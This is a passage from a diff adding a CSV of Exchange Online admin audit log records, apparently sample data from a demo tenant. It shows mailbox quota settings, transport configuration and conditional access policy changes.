+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-06T01:50:55Z,,,Set-TenantObjectVersion,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-06T01:50:53Z,,,Set-RecipientEnforcementProvisioningPolicy,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\Recipient Quota Policy""
+  },
+  {
+    ""Name"": ""PublicFolderHierarchyMailboxCountQuota"",
+    ""Value"": ""100""
+  }
+]"
+2020-05-06T01:50:32Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""TenantAllowBlockLists"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:26Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:22Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:16Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:10Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:05Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:01Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""OrganizationFederatedMailbox"",
+    ""Value"": ""FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-06T01:49:58Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""OMEncryptionStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:49:37Z,,,Install-DataClassificationConfig,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T01:49:21Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""SupervisionTags"",
+    ""Value"": ""Reject;Allow""
+  }
+]"
+2020-05-05T22:11:04Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-06T02:52:30Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-06T02:51:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:51:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:51:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:51:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:51:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:51:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:51:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:51:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:10 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:51:10Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:10 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:51:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-06T02:51:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:51:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:51:10Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
